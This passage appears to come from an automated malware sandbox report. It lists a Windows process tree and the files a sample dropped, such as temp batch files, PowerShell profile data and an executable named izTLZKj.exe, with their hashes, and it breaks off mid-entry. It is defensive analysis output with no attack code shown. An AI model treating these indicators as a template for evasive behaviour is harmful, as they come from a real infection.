                                                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:3524
                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                        C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:3688
                                                                                                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                                                                                                          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:3892
                                                                                                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                            PID:4048
                                                                                                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Suspicious use of UnmapMainImage
                                                                                                                                                                            PID:4104
                                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:4480
                                                                                                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Suspicious use of UnmapMainImage
                                                                                                                                                                              PID:5320
                                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                                              C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:5940
                                                                                                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                                                                                                C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:3744
                                                                                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                                                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:692
                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                    PID:1932
                                                                                                                                                                                  • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                                                                                    "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                    PID:1428
                                                                                                                                                                                  • C:\Windows\system32\SppExtComObj.exe
                                                                                                                                                                                    C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:3084
                                                                                                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                                                                                                      C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:3732
                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:4988
                                                                                                                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:2132
                                                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:2624
                                                                                                                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                              1⤵
                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                              PID:5936
                                                                                                                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:5516
                                                                                                                                                                                              • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                                                                                C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                                PID:4900
                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:2224
                                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:4508
                                                                                                                                                                                                  • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                                                                    C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:5160
                                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:5496
                                                                                                                                                                                                      • C:\Windows\System32\mousocoreworker.exe
                                                                                                                                                                                                        C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                                                        PID:5840
                                                                                                                                                                                                      • C:\Windows\System32\sihclient.exe
                                                                                                                                                                                                        C:\Windows\System32\sihclient.exe /cv RW6r/1UbQk6YVFazm0WaLg.0.2
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:3308
                                                                                                                                                                                                        • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                                                                                          "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:5740
                                                                                                                                                                                                          • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
                                                                                                                                                                                                            C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:5196
                                                                                                                                                                                                            • C:\Windows\system32\BackgroundTransferHost.exe
                                                                                                                                                                                                              "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:3336

                                                                                                                                                                                                              Network

                                                                                                                                                                                                                    MITRE ATT&CK Enterprise v16

                                                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                                                    Downloads

                                                                                                                                                                                                                    • C:\Program Files\7-Zip\Uninstall.exe

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      31KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      705b1e1d10ed605f971072b7500c2c74

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      0cc9665bf92cc460af6cd9ddac4357e98c5b20d7

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      bfaf283ef17bb75e1549787d1dd5ef0914cd89c922ef7ab511a26395672c768f

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      ac08b36a38aaa3583785cd616de252cd102556158e32c14aa8a5362fe05aaa4427f330bffedb63b9e7460f6cb6510749474f940f055bc277bbd9d56703952c4d

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      d85ba6ff808d9e5444a4b369f5bc2730

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\x69.exe.log

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      654B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      2ff39f6c7249774be85fd60a8f9a245e

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      684ff36b31aedc1e587c8496c02722c6698c1c4e

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      944B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      3bfbee2fc19a81c886b0618e7f03dac9

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      2bf1d96d0a8df779a664d3fe7d64af1320d6f318

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      70bb358b8e112c86a0d33df171fccc9889a0b82fead302b77d7aff27342db2e4

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      1ab625306ad6a26a2cf9e430231a3e3070f73093572794f601ebcbd27ed9f5955b5b777476296c670467f58b3ac0439298cee74342bb14a4dbde726208f0892f

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      944B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      0fd3f36f28a947bdd05f1e05acf24489

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      cf12e091a80740df2201c5b47049dd231c530ad3

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      d36c21211f297a74a801881707690fa7a0a0a31addd3c7ba1522275b8848ab50

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      5f132308b06e621aace1091f523649bcb5d1823b478691799791f4154cb96b9897f563eed8ad8db4a03714d815246479372e0920c659eb3fd9006271e58429ee

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      944B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      aeceee3981c528bdc5e1c635b65d223d

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      de9939ed37edca6772f5cdd29f6a973b36b7d31b

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      b99f3c778a047e0348c92c16e0419fa29418d10d0fec61ad8283e92a094a2b32

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      df48285f38e9284efdbd9f8d99e2e94a46fb5465953421ab88497b73ae06895b98ea5c98796560810a6f342c31a9112ea87e03cd3e267fd8518d7585f492a8fb

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      944B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      0256bd284691ed0fc502ef3c8a7e58dc

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      dcdf69dc8ca8bf068f65d20ef1563bbe283e2413

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      e2fb83098e114084f51ed7187334f861ce670051046c39f338928296ca9a49cf

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      c5b29c1e0a15ddb68b0579848066774fa7cdc6f35087bbbf47c05a5c0dcc1eb3e61b2ddadfbded8c1ed9820e637596a9f08a97db8fb18000d168e6b159060c42

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      944B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      eee38c85d7378e574dc4ac9ad2c1f373

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      149613a5500c6285de44192d2703b43da1405933

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      7ff262eeb7e01ef44afebdf869a2925d9c140e0a84867370c6bfb3dc6c272fd2

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      dde1d7845e156a532796ab9c9616a0cf770bf66a3511c4faa93c6df7e0288a67381978688e81211ce8c8fe93e1c9c07a8d0e8b656b5aa9aef520c06fdaedac8c

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      944B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      34f595487e6bfd1d11c7de88ee50356a

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      4caad088c15766cc0fa1f42009260e9a02f953bb

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      944B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      da5c82b0e070047f7377042d08093ff4

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      89d05987cd60828cca516c5c40c18935c35e8bd3

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      77a94ef8c4258445d538a6006ffadb05afdf888f6f044e1e5466b981a07f16c5

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      7360311a3c97b73dd3f6d7179cd979e0e20d69f380d38292447e17e369087d9dd5acb66cd0cbdd95ac4bfb16e5a1b86825f835a8d45b14ea9812102cff59704b

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      944B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      04f1d68afbed6b13399edfae1e9b1472

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      8bfdcb687a995e4a63a8c32df2c66dc89f91a8b0

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      f358f33a42122e97c489fad7bbc8beab2eb42d42e4ec7fce0dd61fe6d8c0b8de

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      30c5e72a8134992094d937d2588f7a503b1d6407d11afe0265b7c8b0ce14071925e5caed13fc4f9c28705df4c7aed3601f81b007048b148af274d7784aa5fb75

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      944B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      5cfe303e798d1cc6c1dab341e7265c15

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      cd2834e05191a24e28a100f3f8114d5a7708dc7c

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      c4d16552769ca1762f6867bce85589c645ac3dc490b650083d74f853f898cfab

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      ef151bbe0033a2caf2d40aff74855a3f42c8171e05a11c8ce93c7039d9430482c43fe93d9164ee94839aff253cad774dbf619dde9a8af38773ca66d59ac3400e

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      944B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      10890cda4b6eab618e926c4118ab0647

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      1e1d63b73a0e6c7575f458b3c7917a9ce5ba776d

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      00f8a035324d39bd62e6dee5e1b480069015471c487ebee4479e6990ea9ddb14

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      a2ee84006c24a36f25e0bca0772430d64e3791f233da916aecdeae6712763e77d55bbbd00dc8f6b2b3887f3c26ab3980b96c5f46cc823e81e28abbbc5fc78221

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      944B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      a7cc007980e419d553568a106210549a

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      c03099706b75071f36c3962fcc60a22f197711e0

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      a5735921fc72189c8bf577f3911486cf031708dc8d6bc764fe3e593c0a053165

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      b9aaf29403c467daef80a1ae87478afc33b78f4e1ca16189557011bb83cf9b3e29a0f85c69fa209c45201fb28baca47d31756eee07b79c6312c506e8370f7666

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      944B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      ba169f4dcbbf147fe78ef0061a95e83b

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      92a571a6eef49fff666e0f62a3545bcd1cdcda67

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      948B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      b40af49a7170e7a9cc8c621876782e5a

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      06df1560c9ed162e07956c4a4f61a5e0f794b0af

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      3401996593b95d1ef81bdaa1696e0a9e44d3abbb7139bcaafe5425dc857e07cb

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      5c6b0d20f326e34da759ede694604d1778ea4dd5ee1805c3a6fdc48f33afa5c01600ef12f5b3262522eb5db486614380732466ebbba485c7f7b6ba6b1c33a654

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      948B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      c1a54dd5a1ab44cc4c4afd42f291c863

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      b77043ab3582680fc96192e9d333a6be0ae0f69d

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      c6dce870a896f3531ae7a10a0c2096d2eb7eb5989ae783aefea6150279502d75

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      010f5093f58b0393d17c824a357513cf4f06239ccddd86c2e0581347ef3b8e7b93f869b0770bdaeb000e4fda7e14f49b9e45663a3839ab049446e9fe08ec535d

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      944B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      b7e1db446e63a2aae76cd85440a08856

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      c900cc81335dd3ca6337e21f5bcde80f8e8a88f3

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      7305bcde3ba246a9b5c1666079c61596cc2ed2c651a1cd9e20557dba8a78c0e4

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      dd63e28017eec632868489e469dd2ba54f20a3024be44550b729a0384bd55c5aa78171f7416612cd5174047afc544e21678ca164359962312b1d853c9bff04ea

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      948B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      217d9191dfd67252cef23229676c9eda

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      80d940b01c28e3933b9d68b3e567adc2bac1289f

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      e64811c3e57476bb644539824034cabe2cabcb88941122193e2af328f5eb2133

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      86767aa3c0eec425b7c6dbfd70a4a334fb5b1227c05fb06fbb3845e7b6974008386276f441c8e66e2bf9b0ae0a76133c4e5602211788cd702eaeadd12c5ff757

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      948B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      083782a87bd50ffc86d70cbc6f04e275

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      0c11bc2b2c2cf33b17fff5e441881131ac1bee31

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      7a54dcc99ebfb850afde560857e2d1f764a53ff09efd03222f56ab547539798f

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      a7e56293e07acce20e69dceb13282e5d1eed2ef972a4c9cf1fb4f973b4b7d6a9ca8714fc547ab662842205383891372a2386fc3a12af3d7e4ef6a195f8a2bf02

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      948B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      721991167161c45d61b03e4dbad4984b

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      fd3fa85d142b5e8d4906d3e5bfe10c5347958457

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      0a7be18529bdbed6fc9f36118a6147920d31099ee0fb5a2a8b6b934d1b9bcefb

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      f1aa4f8e48eeb5b5279530d8557cb292a08b25ad46af0dd072130c395127f6c064c88b04910c626c13f22462104ac3d36fa0d4064fff0ec7528922df54ecdcf0

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      944B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      1542328a8546914b4e2f1aef9cb42bea

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      7a0ac5969dfb20eb974e8a3bd8707243fa68f94f

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      7584152ef93be4dc497db509c723f20a1fd09d69df02d62c897eefda6bf4c737

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      b2b117abc97a64a71538d57c7f6c68c405d7ff5ef91dafe768832ff63378cb627af8b035b2a803627754c2219dd26755a2fa28e3a1bb9b1deb32ba13487ee286

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      64B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      5caad758326454b5788ec35315c4c304

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      3aef8dba8042662a7fcf97e51047dc636b4d4724

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      944B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      cae60f0ddddac635da71bba775a2c5b4

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      386f1a036af61345a7d303d45f5230e2df817477

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      b2dd636b7b0d3bfe44cef5e1175828b1fa7bd84d5563f54342944156ba996c16

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      28ed8a8bc132ef56971cfd7b517b17cdb74a7f8c247ef6bff232996210075e06aa58a415825a1e038cfb547ad3dc6882bf1ca1b68c5b360ef0512a1440850253

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7b925020.bat

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      189B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      6b0e04f3f337f6191a602f6d63f877b6

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      3472f1462fb4b6d3787dab46a0a465844c52f1d9

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      3e9c817ecfa55808d36d01e6f7b1f151775ee32b973a8a4c37a156ad82d8870d

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      25f37cc787f155c6df38d5912f1b305712f90cff8ac056d5ad694366211f194a6eb8c39b902f28bf636c489e9219c063ef77dbacc61c6504df573b1b55d23f40

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\8C42.tmp\8C43.tmp\8C44.bat

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      2df9441936169e60a9631bf730cd4273

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      979ee79524023a77b9577d077a3472b87fda9834

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      24ab289fe2d2dd6e86d9862bf5dac0f6c78acc444eb083152b3eaf84e041f95e

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      ab1e894b85c731e9ce84e0cabbab493935bec18e352bd397cf8b3172bb817e9b174069122180d1fc2d9e538864c1cd77fd5c18ce8dd2a45434c9c045f2bf39ee

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5ri5af0s.lz4.ps1

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      60B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      15KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      56b2c3810dba2e939a8bb9fa36d3cf96

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      99ee31cd4b0d6a4b62779da36e0eeecdd80589fc

